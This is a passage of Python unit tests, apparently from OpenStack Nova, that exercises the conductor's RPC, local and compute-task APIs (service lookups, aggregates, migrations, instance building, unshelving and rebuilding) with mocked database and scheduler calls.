self.assertIn('dict', updates)
self.assertEqual({'foo': 'bar'}, updates['dict'])
def _test_expected_exceptions(self, db_method, conductor_method, errors,
*args, **kwargs):
# Tests that expected exceptions are handled properly.
for error in errors:
with mock.patch.object(db, db_method, side_effect=error):
self.assertRaises(messaging.ExpectedException,
conductor_method,
self.context, *args, **kwargs)
def test_action_event_start_expected_exceptions(self):
error = exc.InstanceActionNotFound(request_id='1', instance_uuid='2')
self._test_expected_exceptions(
'action_event_start', self.conductor.action_event_start, [error],
{'foo': 'bar'})
def test_action_event_finish_expected_exceptions(self):
errors = (exc.InstanceActionNotFound(request_id='1',
instance_uuid='2'),
exc.InstanceActionEventNotFound(event='1', action_id='2'))
self._test_expected_exceptions(
'action_event_finish', self.conductor.action_event_finish,
errors, {'foo': 'bar'})
def test_instance_update_expected_exceptions(self):
errors = (exc.InvalidUUID(uuid='foo'),
exc.InstanceNotFound(instance_id=1),
exc.UnexpectedTaskStateError(expected='foo',
actual='bar'))
self._test_expected_exceptions(
'instance_update', self.conductor.instance_update,
errors, None, {'foo': 'bar'}, None)
def test_instance_get_by_uuid_expected_exceptions(self):
error = exc.InstanceNotFound(instance_id=1)
self._test_expected_exceptions(
'instance_get_by_uuid', self.conductor.instance_get_by_uuid,
[error], None, [])
def test_aggregate_host_add_expected_exceptions(self):
error = exc.AggregateHostExists(aggregate_id=1, host='foo')
self._test_expected_exceptions(
'aggregate_host_add', self.conductor.aggregate_host_add,
[error], {'id': 1}, None)
def test_aggregate_host_delete_expected_exceptions(self):
error = exc.AggregateHostNotFound(aggregate_id=1, host='foo')
self._test_expected_exceptions(
'aggregate_host_delete', self.conductor.aggregate_host_delete,
[error], {'id': 1}, None)
def test_service_update_expected_exceptions(self):
error = exc.ServiceNotFound(service_id=1)
self._test_expected_exceptions(
'service_update',
self.conductor.service_update,
[error], {'id': 1}, None)
def test_service_destroy_expected_exceptions(self):
error = exc.ServiceNotFound(service_id=1)
self._test_expected_exceptions(
'service_destroy',
self.conductor.service_destroy,
[error], 1)
def _setup_aggregate_with_host(self):
aggregate_ref = db.aggregate_create(self.context.elevated(),
{'name': 'foo'}, metadata={'availability_zone': 'foo'})
self.conductor.aggregate_host_add(self.context, aggregate_ref, 'bar')
aggregate_ref = db.aggregate_get(self.context.elevated(),
aggregate_ref['id'])
return aggregate_ref
def test_aggregate_host_add(self):
aggregate_ref = self._setup_aggregate_with_host()
self.assertIn('bar', aggregate_ref['hosts'])
db.aggregate_delete(self.context.elevated(), aggregate_ref['id'])
def test_aggregate_host_delete(self):
aggregate_ref = self._setup_aggregate_with_host()
self.conductor.aggregate_host_delete(self.context, aggregate_ref,
'bar')
aggregate_ref = db.aggregate_get(self.context.elevated(),
aggregate_ref['id'])
self.assertNotIn('bar', aggregate_ref['hosts'])
db.aggregate_delete(self.context.elevated(), aggregate_ref['id'])
def test_network_migrate_instance_start(self):
self.mox.StubOutWithMock(self.conductor_manager.network_api,
'migrate_instance_start')
self.conductor_manager.network_api.migrate_instance_start(self.context,
'instance',
'migration')
self.mox.ReplayAll()
self.conductor.network_migrate_instance_start(self.context,
'instance',
'migration')
def test_network_migrate_instance_finish(self):
self.mox.StubOutWithMock(self.conductor_manager.network_api,
'migrate_instance_finish')
self.conductor_manager.network_api.migrate_instance_finish(
self.context, 'instance', 'migration')
self.mox.ReplayAll()
self.conductor.network_migrate_instance_finish(self.context,
'instance',
'migration')
def test_instance_destroy(self):
self.mox.StubOutWithMock(db, 'instance_destroy')
db.instance_destroy(self.context, 'fake-uuid').AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.instance_destroy(self.context,
{'uuid': 'fake-uuid'})
self.assertEqual(result, 'fake-result')
def test_compute_unrescue(self):
self.mox.StubOutWithMock(self.conductor_manager.compute_api,
'unrescue')
self.conductor_manager.compute_api.unrescue(self.context, 'instance')
self.mox.ReplayAll()
self.conductor.compute_unrescue(self.context, 'instance')
def test_instance_get_active_by_window_joined(self):
self.mox.StubOutWithMock(db, 'instance_get_active_by_window_joined')
db.instance_get_active_by_window_joined(self.context, 'fake-begin',
'fake-end', 'fake-proj',
'fake-host')
self.mox.ReplayAll()
self.conductor.instance_get_active_by_window_joined(
self.context, 'fake-begin', 'fake-end', 'fake-proj', 'fake-host')
def test_instance_fault_create(self):
self.mox.StubOutWithMock(db, 'instance_fault_create')
db.instance_fault_create(self.context, 'fake-values').AndReturn(
'fake-result')
self.mox.ReplayAll()
result = self.conductor.instance_fault_create(self.context,
'fake-values')
self.assertEqual(result, 'fake-result')
def test_action_event_start(self):
self.mox.StubOutWithMock(db, 'action_event_start')
db.action_event_start(self.context, mox.IgnoreArg())
self.mox.ReplayAll()
self.conductor.action_event_start(self.context, {})
def test_action_event_finish(self):
self.mox.StubOutWithMock(db, 'action_event_finish')
db.action_event_finish(self.context, mox.IgnoreArg())
self.mox.ReplayAll()
self.conductor.action_event_finish(self.context, {})
def test_agent_build_get_by_triple(self):
self.mox.StubOutWithMock(db, 'agent_build_get_by_triple')
db.agent_build_get_by_triple(self.context, 'fake-hv', 'fake-os',
'fake-arch').AndReturn('it worked')
self.mox.ReplayAll()
result = self.conductor.agent_build_get_by_triple(self.context,
'fake-hv',
'fake-os',
'fake-arch')
self.assertEqual(result, 'it worked')
class ConductorRPCAPITestCase(_BaseTestCase, test.TestCase):
"""Conductor RPC API Tests."""
def setUp(self):
super(ConductorRPCAPITestCase, self).setUp()
self.conductor_service = self.start_service(
'conductor', manager='nova.conductor.manager.ConductorManager')
self.conductor_manager = self.conductor_service.manager
self.conductor = conductor_rpcapi.ConductorAPI()
def test_block_device_mapping_update_or_create(self):
fake_bdm = {'id': 'fake-id'}
self.mox.StubOutWithMock(db, 'block_device_mapping_create')
self.mox.StubOutWithMock(db, 'block_device_mapping_update')
self.mox.StubOutWithMock(db, 'block_device_mapping_update_or_create')
self.mox.StubOutWithMock(block_device_obj.BlockDeviceMapping,
'_from_db_object')
db.block_device_mapping_create(self.context, fake_bdm)
block_device_obj.BlockDeviceMapping._from_db_object(
self.context, mox.IgnoreArg(), mox.IgnoreArg())
db.block_device_mapping_update(self.context, fake_bdm['id'], fake_bdm)
block_device_obj.BlockDeviceMapping._from_db_object(
self.context, mox.IgnoreArg(), mox.IgnoreArg())
db.block_device_mapping_update_or_create(self.context, fake_bdm)
block_device_obj.BlockDeviceMapping._from_db_object(
self.context, mox.IgnoreArg(), mox.IgnoreArg())
self.mox.ReplayAll()
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm,
create=True)
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm,
create=False)
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm)
def _test_stubbed(self, name, dbargs, condargs,
db_result_listified=False, db_exception=None):
self.mox.StubOutWithMock(db, name)
if db_exception:
getattr(db, name)(self.context, *dbargs).AndRaise(db_exception)
else:
getattr(db, name)(self.context, *dbargs).AndReturn('fake-result')
self.mox.ReplayAll()
if db_exception:
self.assertRaises(db_exception.__class__,
self.conductor.service_get_all_by,
self.context, **condargs)
else:
result = self.conductor.service_get_all_by(self.context,
**condargs)
if db_result_listified:
self.assertEqual(['fake-result'], result)
else:
self.assertEqual('fake-result', result)
def test_service_get_all(self):
self._test_stubbed('service_get_all', (),
dict(topic=None, host=None, binary=None))
def test_service_get_by_host_and_topic(self):
self._test_stubbed('service_get_by_host_and_topic',
('host', 'topic'),
dict(topic='topic', host='host', binary=None))
def test_service_get_all_by_topic(self):
self._test_stubbed('service_get_all_by_topic',
('topic',),
dict(topic='topic', host=None, binary=None))
def test_service_get_all_by_host(self):
self._test_stubbed('service_get_all_by_host',
('host',),
dict(host='host', topic=None, binary=None))
def test_service_get_by_compute_host(self):
self._test_stubbed('service_get_by_compute_host',
('host',),
dict(topic='compute', host='host', binary=None),
db_result_listified=True)
def test_service_get_by_args(self):
self._test_stubbed('service_get_by_args',
('host', 'binary'),
dict(host='host', binary='binary', topic=None))
def test_service_get_by_compute_host_not_found(self):
self._test_stubbed('service_get_by_compute_host',
('host',),
dict(topic='compute', host='host', binary=None),
db_exception=exc.ComputeHostNotFound(host='host'))
def test_service_get_by_args_not_found(self):
self._test_stubbed('service_get_by_args',
('host', 'binary'),
dict(host='host', binary='binary', topic=None),
db_exception=exc.HostBinaryNotFound(binary='binary',
host='host'))
def test_security_groups_trigger_handler(self):
self.mox.StubOutWithMock(self.conductor_manager.security_group_api,
'trigger_handler')
self.conductor_manager.security_group_api.trigger_handler('event',
self.context,
'arg')
self.mox.ReplayAll()
self.conductor.security_groups_trigger_handler(self.context,
'event', ['arg'])
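# The next three tests verify that the RPC timeout passed to prepare()
# tracks CONF.report_interval, falling back to the client default when
# report_interval is unset.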
@mock.patch.object(db, 'service_update')
@mock.patch('oslo.messaging.RPCClient.prepare')
def test_service_update_time_big(self, mock_prepare, mock_update):
CONF.set_override('report_interval', 10)
services = {'id': 1}
self.conductor.service_update(self.context, services, {})
mock_prepare.assert_called_once_with(timeout=9)
@mock.patch.object(db, 'service_update')
@mock.patch('oslo.messaging.RPCClient.prepare')
def test_service_update_time_small(self, mock_prepare, mock_update):
CONF.set_override('report_interval', 3)
services = {'id': 1}
self.conductor.service_update(self.context, services, {})
mock_prepare.assert_called_once_with(timeout=3)
@mock.patch.object(db, 'service_update')
@mock.patch('oslo.messaging.RPCClient.prepare')
def test_service_update_no_time(self, mock_prepare, mock_update):
CONF.set_override('report_interval', None)
services = {'id': 1}
self.conductor.service_update(self.context, services, {})
mock_prepare.assert_called_once_with()
class ConductorAPITestCase(_BaseTestCase, test.TestCase):
"""Conductor API Tests."""
def setUp(self):
super(ConductorAPITestCase, self).setUp()
self.conductor_service = self.start_service(
'conductor', manager='nova.conductor.manager.ConductorManager')
self.conductor = conductor_api.API()
self.conductor_manager = self.conductor_service.manager
self.db = None
def _do_update(self, instance_uuid, **updates):
# NOTE(danms): the public API takes actual keyword arguments,
# so override the base class here to make the call correctly
return self.conductor.instance_update(self.context, instance_uuid,
**updates)
def test_bw_usage_get(self):
self.mox.StubOutWithMock(db, 'bw_usage_update')
self.mox.StubOutWithMock(db, 'bw_usage_get')
get_args = (self.context, 'uuid', 0, 'mac')
db.bw_usage_get(*get_args).AndReturn('foo')
self.mox.ReplayAll()
result = self.conductor.bw_usage_get(*get_args)
self.assertEqual(result, 'foo')
def test_block_device_mapping_update_or_create(self):
self.mox.StubOutWithMock(db, 'block_device_mapping_create')
self.mox.StubOutWithMock(db, 'block_device_mapping_update')
self.mox.StubOutWithMock(db, 'block_device_mapping_update_or_create')
self.mox.StubOutWithMock(block_device_obj.BlockDeviceMapping,
'_from_db_object')
db.block_device_mapping_create(self.context, 'fake-bdm')
block_device_obj.BlockDeviceMapping._from_db_object(
self.context, mox.IgnoreArg(), mox.IgnoreArg())
db.block_device_mapping_update(self.context,
'fake-id', {'id': 'fake-id'})
block_device_obj.BlockDeviceMapping._from_db_object(
self.context, mox.IgnoreArg(), mox.IgnoreArg())
db.block_device_mapping_update_or_create(self.context, 'fake-bdm')
block_device_obj.BlockDeviceMapping._from_db_object(
self.context, mox.IgnoreArg(), mox.IgnoreArg())
self.mox.ReplayAll()
self.conductor.block_device_mapping_create(self.context, 'fake-bdm')
self.conductor.block_device_mapping_update(self.context, 'fake-id', {})
self.conductor.block_device_mapping_update_or_create(self.context,
'fake-bdm')
def _test_stubbed(self, name, *args, **kwargs):
if args and isinstance(args[0], FakeContext):
ctxt = args[0]
args = args[1:]
else:
ctxt = self.context
db_exception = kwargs.get('db_exception')
self.mox.StubOutWithMock(db, name)
if db_exception:
getattr(db, name)(ctxt, *args).AndRaise(db_exception)
else:
getattr(db, name)(ctxt, *args).AndReturn('fake-result')
if name == 'service_destroy':
            # TODO(russellb) This is a hack ... setUp() starts the conductor
# service. There is a cleanup step that runs after this test which
# also deletes the associated service record. This involves a call
# to db.service_destroy(), which we have stubbed out.
db.service_destroy(mox.IgnoreArg(), mox.IgnoreArg())
self.mox.ReplayAll()
if db_exception:
self.assertRaises(db_exception.__class__,
getattr(self.conductor, name),
self.context, *args)
else:
result = getattr(self.conductor, name)(self.context, *args)
self.assertEqual(
result, 'fake-result' if kwargs.get('returns', True) else None)
def test_service_get_all(self):
self._test_stubbed('service_get_all')
def test_service_get_by_host_and_topic(self):
self._test_stubbed('service_get_by_host_and_topic', 'host', 'topic')
def test_service_get_all_by_topic(self):
self._test_stubbed('service_get_all_by_topic', 'topic')
def test_service_get_all_by_host(self):
self._test_stubbed('service_get_all_by_host', 'host')
def test_service_get_by_compute_host(self):
self._test_stubbed('service_get_by_compute_host', 'host')
def test_service_get_by_args(self):
self._test_stubbed('service_get_by_args', 'host', 'binary')
def test_service_get_by_compute_host_not_found(self):
self._test_stubbed('service_get_by_compute_host', 'host',
db_exception=exc.ComputeHostNotFound(host='host'))
def test_service_get_by_args_not_found(self):
self._test_stubbed('service_get_by_args', 'host', 'binary',
db_exception=exc.HostBinaryNotFound(binary='binary',
host='host'))
def test_service_create(self):
self._test_stubbed('service_create', {})
def test_service_destroy(self):
self._test_stubbed('service_destroy', '', returns=False)
def test_service_update(self):
ctxt = self.context
self.mox.StubOutWithMock(db, 'service_update')
db.service_update(ctxt, '', {}).AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.service_update(self.context, {'id': ''}, {})
self.assertEqual(result, 'fake-result')
def test_instance_get_all_by_host_and_node(self):
self._test_stubbed('instance_get_all_by_host_and_node',
self.context.elevated(), 'host', 'node')
def test_instance_get_all_by_host(self):
self.mox.StubOutWithMock(db, 'instance_get_all_by_host')
self.mox.StubOutWithMock(db, 'instance_get_all_by_host_and_node')
db.instance_get_all_by_host(self.context.elevated(), 'host',
None).AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.instance_get_all_by_host(self.context,
'host', None)
self.assertEqual(result, 'fake-result')
def test_wait_until_ready(self):
timeouts = []
calls = dict(count=0)
def fake_ping(context, message, timeout):
timeouts.append(timeout)
calls['count'] += 1
if calls['count'] < 15:
raise messaging.MessagingTimeout("fake")
self.stubs.Set(self.conductor.base_rpcapi, 'ping', fake_ping)
self.conductor.wait_until_ready(self.context)
self.assertEqual(timeouts.count(10), 10)
self.assertIn(None, timeouts)
def test_security_groups_trigger_handler(self):
self.mox.StubOutWithMock(self.conductor_manager.security_group_api,
'trigger_handler')
self.conductor_manager.security_group_api.trigger_handler('event',
self.context,
'arg')
self.mox.ReplayAll()
self.conductor.security_groups_trigger_handler(self.context,
'event', 'arg')
class ConductorLocalAPITestCase(ConductorAPITestCase):
"""Conductor LocalAPI Tests."""
def setUp(self):
super(ConductorLocalAPITestCase, self).setUp()
self.conductor = conductor_api.LocalAPI()
self.conductor_manager = self.conductor._manager._target
self.db = db
def test_client_exceptions(self):
instance = self._create_fake_instance()
# NOTE(danms): The LocalAPI should not raise exceptions wrapped
# in ClientException. KeyError should be raised if an invalid
# update key is passed, so use that to validate.
self.assertRaises(KeyError,
self._do_update, instance['uuid'], foo='bar')
def test_wait_until_ready(self):
# Override test in ConductorAPITestCase
pass
class ConductorImportTest(test.TestCase):
def test_import_conductor_local(self):
self.flags(use_local=True, group='conductor')
self.assertIsInstance(conductor.API(), conductor_api.LocalAPI)
self.assertIsInstance(conductor.ComputeTaskAPI(),
conductor_api.LocalComputeTaskAPI)
def test_import_conductor_rpc(self):
self.flags(use_local=False, group='conductor')
self.assertIsInstance(conductor.API(), conductor_api.API)
self.assertIsInstance(conductor.ComputeTaskAPI(),
conductor_api.ComputeTaskAPI)
def test_import_conductor_override_to_local(self):
self.flags(use_local=False, group='conductor')
self.assertIsInstance(conductor.API(use_local=True),
conductor_api.LocalAPI)
self.assertIsInstance(conductor.ComputeTaskAPI(use_local=True),
conductor_api.LocalComputeTaskAPI)
class ConductorPolicyTest(test.TestCase):
def test_all_allowed_keys(self):
def fake_db_instance_update(self, *args, **kwargs):
return None, None
self.stubs.Set(db, 'instance_update_and_get_original',
fake_db_instance_update)
ctxt = context.RequestContext('fake-user', 'fake-project')
conductor = conductor_api.LocalAPI()
updates = {}
for key in conductor_manager.allowed_updates:
if key in conductor_manager.datetime_fields:
updates[key] = timeutils.utcnow()
else:
updates[key] = 'foo'
conductor.instance_update(ctxt, 'fake-instance', **updates)
def test_allowed_keys_are_real(self):
instance = models.Instance()
keys = list(conductor_manager.allowed_updates)
# NOTE(danms): expected_task_state is a parameter that gets
# passed to the db layer, but is not actually an instance attribute
del keys[keys.index('expected_task_state')]
for key in keys:
self.assertTrue(hasattr(instance, key))
class _BaseTaskTestCase(object):
def setUp(self):
super(_BaseTaskTestCase, self).setUp()
self.user_id = 'fake'
self.project_id = 'fake'
self.context = FakeContext(self.user_id, self.project_id)
fake_server_actions.stub_out_action_events(self.stubs)
def fake_deserialize_context(serializer, ctxt_dict):
self.assertEqual(self.context.user_id, ctxt_dict['user_id'])
self.assertEqual(self.context.project_id, ctxt_dict['project_id'])
return self.context
self.stubs.Set(rpc.RequestContextSerializer, 'deserialize_context',
fake_deserialize_context)
def _prepare_rebuild_args(self, update_args=None):
rebuild_args = {'new_pass': 'admin_password',
'injected_files': 'files_to_inject',
'image_ref': 'image_ref',
'orig_image_ref': 'orig_image_ref',
'orig_sys_metadata': 'orig_sys_meta',
'bdms': {},
'recreate': False,
'on_shared_storage': False,
'preserve_ephemeral': False,
'host': 'compute-host'}
if update_args:
rebuild_args.update(update_args)
return rebuild_args
def test_live_migrate(self):
inst = fake_instance.fake_db_instance()
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), inst, [])
self.mox.StubOutWithMock(live_migrate, 'execute')
live_migrate.execute(self.context,
mox.IsA(objects.Instance),
'destination',
'block_migration',
'disk_over_commit')
self.mox.ReplayAll()
if isinstance(self.conductor, (conductor_api.ComputeTaskAPI,
conductor_api.LocalComputeTaskAPI)):
# The API method is actually 'live_migrate_instance'. It gets
# converted into 'migrate_server' when doing RPC.
self.conductor.live_migrate_instance(self.context, inst_obj,
'destination', 'block_migration', 'disk_over_commit')
else:
self.conductor.migrate_server(self.context, inst_obj,
{'host': 'destination'}, True, False, None,
'block_migration', 'disk_over_commit')
def test_cold_migrate(self):
self.mox.StubOutWithMock(compute_utils, 'get_image_metadata')
self.mox.StubOutWithMock(scheduler_utils, 'build_request_spec')
self.mox.StubOutWithMock(
self.conductor_manager.compute_rpcapi, 'prep_resize')
self.mox.StubOutWithMock(self.conductor_manager.scheduler_client,
'select_destinations')
inst = fake_instance.fake_db_instance(image_ref='image_ref')
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), inst, [])
flavor = flavors.get_default_flavor()
flavor['extra_specs'] = 'extra_specs'
request_spec = {'instance_type': flavor,
'instance_properties': {}}
compute_utils.get_image_metadata(
self.context, self.conductor_manager.image_api,
'image_ref', mox.IsA(objects.Instance)).AndReturn('image')
scheduler_utils.build_request_spec(
self.context, 'image',
[mox.IsA(objects.Instance)],
instance_type=flavor).AndReturn(request_spec)
hosts = [dict(host='host1', nodename=None, limits={})]
self.conductor_manager.scheduler_client.select_destinations(
self.context, request_spec,
{'retry': {'num_attempts': 1, 'hosts': []}}).AndReturn(hosts)
filter_properties = {'limits': {},
'retry': {'num_attempts': 1,
'hosts': [['host1', None]]}}
self.conductor_manager.compute_rpcapi.prep_resize(
self.context, 'image', mox.IsA(objects.Instance),
mox.IsA(dict), 'host1', [], request_spec=request_spec,
filter_properties=filter_properties, node=None)
self.mox.ReplayAll()
scheduler_hint = {'filter_properties': {}}
if isinstance(self.conductor, (conductor_api.ComputeTaskAPI,
conductor_api.LocalComputeTaskAPI)):
# The API method is actually 'resize_instance'. It gets
# converted into 'migrate_server' when doing RPC.
self.conductor.resize_instance(
self.context, inst_obj, {}, scheduler_hint, flavor, [])
else:
self.conductor.migrate_server(
self.context, inst_obj, scheduler_hint,
False, False, flavor, None, None, [])
def test_build_instances(self):
system_metadata = flavors.save_flavor_info({},
flavors.get_default_flavor())
instances = [fake_instance.fake_instance_obj(
self.context,
system_metadata=system_metadata,
expected_attrs=['system_metadata']) for i in xrange(2)]
instance_type = flavors.extract_flavor(instances[0])
instance_type['extra_specs'] = 'fake-specs'
instance_properties = jsonutils.to_primitive(instances[0])
self.mox.StubOutWithMock(db, 'flavor_extra_specs_get')
self.mox.StubOutWithMock(self.conductor_manager.scheduler_client,
'select_destinations')
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
self.mox.StubOutWithMock(db,
'block_device_mapping_get_all_by_instance')
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'build_and_run_instance')
db.flavor_extra_specs_get(
self.context,
instance_type['flavorid']).AndReturn('fake-specs')
self.conductor_manager.scheduler_client.select_destinations(
self.context, {'image': {'fake_data': 'should_pass_silently'},
'instance_properties': jsonutils.to_primitive(
instances[0]),
'instance_type': instance_type,
'instance_uuids': [inst.uuid for inst in instances],
'num_instances': 2},
{'retry': {'num_attempts': 1, 'hosts': []}}).AndReturn(
[{'host': 'host1', 'nodename': 'node1', 'limits': []},
{'host': 'host2', 'nodename': 'node2', 'limits': []}])
db.instance_get_by_uuid(self.context, instances[0].uuid,
columns_to_join=['system_metadata'],
use_slave=False).AndReturn(
jsonutils.to_primitive(instances[0]))
db.block_device_mapping_get_all_by_instance(self.context,
instances[0].uuid, use_slave=False).AndReturn([])
self.conductor_manager.compute_rpcapi.build_and_run_instance(
self.context,
instance=mox.IgnoreArg(),
host='host1',
image={'fake_data': 'should_pass_silently'},
request_spec={
'image': {'fake_data': 'should_pass_silently'},
'instance_properties': instance_properties,
'instance_type': instance_type,
'instance_uuids': [inst.uuid for inst in instances],
'num_instances': 2},
filter_properties={'retry': {'num_attempts': 1,
'hosts': [['host1', 'node1']]},
'limits': []},
admin_password='admin_password',
injected_files='injected_files',
requested_networks=None,
security_groups='security_groups',
block_device_mapping=mox.IgnoreArg(),
node='node1', limits=[])
db.instance_get_by_uuid(self.context, instances[1].uuid,
columns_to_join=['system_metadata'],
use_slave=False).AndReturn(
jsonutils.to_primitive(instances[1]))
db.block_device_mapping_get_all_by_instance(self.context,
instances[1].uuid, use_slave=False).AndReturn([])
self.conductor_manager.compute_rpcapi.build_and_run_instance(
self.context,
instance=mox.IgnoreArg(),
host='host2',
image={'fake_data': 'should_pass_silently'},
request_spec={
'image': {'fake_data': 'should_pass_silently'},
'instance_properties': instance_properties,
'instance_type': instance_type,
'instance_uuids': [inst.uuid for inst in instances],
'num_instances': 2},
filter_properties={'limits': [],
'retry': {'num_attempts': 1,
'hosts': [['host2', 'node2']]}},
admin_password='admin_password',
injected_files='injected_files',
requested_networks=None,
security_groups='security_groups',
block_device_mapping=mox.IgnoreArg(),
node='node2', limits=[])
self.mox.ReplayAll()
# build_instances() is a cast, we need to wait for it to complete
self.useFixture(cast_as_call.CastAsCall(self.stubs))
self.conductor.build_instances(self.context,
instances=instances,
image={'fake_data': 'should_pass_silently'},
filter_properties={},
admin_password='admin_password',
injected_files='injected_files',
requested_networks=None,
security_groups='security_groups',
block_device_mapping='block_device_mapping',
legacy_bdm=False)
def test_build_instances_scheduler_failure(self):
instances = [fake_instance.fake_instance_obj(self.context)
for i in xrange(2)]
image = {'fake-data': 'should_pass_silently'}
spec = {'fake': 'specs',
'instance_properties': instances[0]}
exception = exc.NoValidHost(reason='fake-reason')
self.mox.StubOutWithMock(scheduler_utils, 'build_request_spec')
self.mox.StubOutWithMock(scheduler_driver, 'handle_schedule_error')
self.mox.StubOutWithMock(self.conductor_manager.scheduler_client,
'select_destinations')
scheduler_utils.build_request_spec(self.context, image,
mox.IgnoreArg()).AndReturn(spec)
self.conductor_manager.scheduler_client.select_destinations(
self.context, spec,
{'retry': {'num_attempts': 1,
'hosts': []}}).AndRaise(exception)
for instance in instances:
scheduler_driver.handle_schedule_error(self.context, exception,
instance.uuid, spec)
self.mox.ReplayAll()
# build_instances() is a cast, we need to wait for it to complete
self.useFixture(cast_as_call.CastAsCall(self.stubs))
self.conductor.build_instances(self.context,
instances=instances,
image=image,
filter_properties={},
admin_password='admin_password',
injected_files='injected_files',
requested_networks=None,
security_groups='security_groups',
block_device_mapping='block_device_mapping',
legacy_bdm=False)
def test_unshelve_instance_on_host(self):
db_instance = self._create_fake_instance()
instance = objects.Instance.get_by_uuid(self.context,
db_instance['uuid'], expected_attrs=['system_metadata'])
instance.vm_state = vm_states.SHELVED
instance.task_state = task_states.UNSHELVING
instance.save()
system_metadata = instance.system_metadata
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'start_instance')
self.mox.StubOutWithMock(self.conductor_manager, '_delete_image')
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'unshelve_instance')
self.conductor_manager.compute_rpcapi.start_instance(self.context,
instance)
self.conductor_manager._delete_image(self.context,
'fake_image_id')
self.mox.ReplayAll()
system_metadata['shelved_at'] = timeutils.utcnow()
system_metadata['shelved_image_id'] = 'fake_image_id'
system_metadata['shelved_host'] = 'fake-mini'
self.conductor_manager.unshelve_instance(self.context, instance)
def test_unshelve_offloaded_instance_glance_image_not_found(self):
shelved_image_id = "image_not_found"
db_instance = self._create_fake_instance()
instance = objects.Instance.get_by_uuid(
self.context,
db_instance['uuid'],
expected_attrs=['system_metadata'])
instance.vm_state = vm_states.SHELVED_OFFLOADED
instance.task_state = task_states.UNSHELVING
instance.save()
system_metadata = instance.system_metadata
self.mox.StubOutWithMock(self.conductor_manager.image_api, 'get')
e = exc.ImageNotFound(image_id=shelved_image_id)
self.conductor_manager.image_api.get(
self.context, shelved_image_id).AndRaise(e)
self.mox.ReplayAll()
system_metadata['shelved_at'] = timeutils.utcnow()
system_metadata['shelved_host'] = 'fake-mini'
system_metadata['shelved_image_id'] = shelved_image_id
self.assertRaises(
exc.UnshelveException,
self.conductor_manager.unshelve_instance,
self.context, instance)
self.assertEqual(instance.vm_state, vm_states.ERROR)
def test_unshelve_instance_schedule_and_rebuild(self):
db_instance = self._create_fake_instance()
instance = objects.Instance.get_by_uuid(self.context,
db_instance['uuid'], expected_attrs=['system_metadata'])
instance.vm_state = vm_states.SHELVED_OFFLOADED
instance.save()
filter_properties = {}
system_metadata = instance.system_metadata
self.mox.StubOutWithMock(self.conductor_manager.image_api, 'get')
self.mox.StubOutWithMock(self.conductor_manager, '_schedule_instances')
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'unshelve_instance')
self.conductor_manager.image_api.get(self.context,
'fake_image_id').AndReturn('fake_image')
self.conductor_manager._schedule_instances(self.context,
'fake_image', filter_properties, instance).AndReturn(
[{'host': 'fake_host',
'nodename': 'fake_node',
'limits': {}}])
self.conductor_manager.compute_rpcapi.unshelve_instance(self.context,
instance, 'fake_host', image='fake_image',
filter_properties={'limits': {}}, node='fake_node')
self.mox.ReplayAll()
system_metadata['shelved_at'] = timeutils.utcnow()
system_metadata['shelved_image_id'] = 'fake_image_id'
system_metadata['shelved_host'] = 'fake-mini'
self.conductor_manager.unshelve_instance(self.context, instance)
def test_unshelve_instance_schedule_and_rebuild_novalid_host(self):
db_instance = self._create_fake_instance()
instance = objects.Instance.get_by_uuid(self.context,
db_instance['uuid'], expected_attrs=['system_metadata'])
instance.vm_state = vm_states.SHELVED_OFFLOADED
instance.save()
system_metadata = instance.system_metadata
def fake_schedule_instances(context, image, filter_properties,
*instances):
raise exc.NoValidHost(reason='')
with contextlib.nested(
mock.patch.object(self.conductor_manager.image_api, 'get',
return_value='fake_image'),
mock.patch.object(self.conductor_manager, '_schedule_instances',
fake_schedule_instances)
) as (_get_image, _schedule_instances):
system_metadata['shelved_at'] = timeutils.utcnow()
system_metadata['shelved_image_id'] = 'fake_image_id'
system_metadata['shelved_host'] = 'fake-mini'
self.conductor_manager.unshelve_instance(self.context, instance)
_get_image.assert_has_calls([mock.call(self.context,
system_metadata['shelved_image_id'])])
self.assertEqual(vm_states.SHELVED_OFFLOADED, instance.vm_state)
def test_unshelve_instance_schedule_and_rebuild_volume_backed(self):
db_instance = self._create_fake_instance()
instance = objects.Instance.get_by_uuid(self.context,
db_instance['uuid'], expected_attrs=['system_metadata'])
instance.vm_state = vm_states.SHELVED_OFFLOADED
instance.save()
filter_properties = {}
system_metadata = instance.system_metadata
self.mox.StubOutWithMock(self.conductor_manager.image_api, 'get')
self.mox.StubOutWithMock(self.conductor_manager, '_schedule_instances')
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'unshelve_instance')
self.conductor_manager.image_api.get(self.context,
'fake_image_id').AndReturn(None)
self.conductor_manager._schedule_instances(self.context,
None, filter_properties, instance).AndReturn(
[{'host': 'fake_host',
'nodename': 'fake_node',
'limits': {}}])
self.conductor_manager.compute_rpcapi.unshelve_instance(self.context,
instance, 'fake_host', image=None,
filter_properties={'limits': {}}, node='fake_node')
self.mox.ReplayAll()
system_metadata['shelved_at'] = timeutils.utcnow()
system_metadata['shelved_image_id'] = 'fake_image_id'
system_metadata['shelved_host'] = 'fake-mini'
self.conductor_manager.unshelve_instance(self.context, instance)
def test_rebuild_instance(self):
db_instance = self._create_fake_instance()
inst_obj = objects.Instance.get_by_uuid(self.context,
db_instance['uuid'])
rebuild_args = self._prepare_rebuild_args({'host': inst_obj.host})
with contextlib.nested(
mock.patch.object(self.conductor_manager.compute_rpcapi,
'rebuild_instance'),
mock.patch.object(self.conductor_manager.scheduler_client,
'select_destinations')
) as (rebuild_mock, select_dest_mock):
self.conductor_manager.rebuild_instance(context=self.context,
instance=inst_obj,
**rebuild_args)
self.assertFalse(select_dest_mock.called)
rebuild_mock.assert_called_once_with(self.context,
instance=inst_obj,
**rebuild_args)
def test_rebuild_instance_with_scheduler(self):
db_instance = self._create_fake_instance()
inst_obj = objects.Instance.get_by_uuid(self.context,
db_instance['uuid'])
inst_obj.host = 'noselect'
